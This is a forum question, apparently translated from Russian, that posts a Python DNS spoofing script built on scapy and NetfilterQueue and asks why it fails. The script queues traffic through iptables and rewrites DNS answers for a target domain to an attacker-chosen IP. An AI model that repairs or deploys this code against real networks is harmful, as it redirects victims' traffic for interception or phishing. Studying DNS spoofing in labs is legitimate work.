L
L
link_vrb2022-01-23 11:16:00
Python
link_vrb, 2022-01-23 11:16:00

How to implement packet sniffing in python3?

How to implement python packet capture?
I have code:

from netfilterqueue import NetfilterQueue
from scapy.all import *
from subprocess import call
call('sudo iptables -I OUTPUT -j NFQUEUE --queue-num 1', shell=True)
call('sudo iptables -I INPUT -j NFQUEUE --queue-num 1', shell=True)
def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    if scapy_packet.haslayer(DNSRR):
        qname = scapy_packet[DNSQR].qname
        stq=str(qname)
        if "домен" in stq:
            print("[+] Spoofing target...")
            answer = DNSRR(rrname = qname, rdata = "myip")
            scapy_packet[DNS].an = answer
            scapy_packet[DNS].ancount = 1
            scapy_packet.dport=port
            try:
                del scapy_packet[IP].len
                del scapy_packet[IP].chksum
            except:
                pass
            try:
                del scapy_packet[UDP].chksum
                del scapy_packet[UDP].len
            except:
                pass
            packet.set_payload(bytes(scapy_packet))
    packet.accept()


qu = NetfilterQueue()
qu.bind(1, process_packet)
try:
    qu.run()
except KeyboardInterrupt:
    call('iptables --flush', shell=True)


When you run it and go to the 'domain' site, the program does not change the 'domain' ip to the 'myip' ip, although it should display the 'domain' page.

Answer the question

In order to leave comments, you need to log in

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question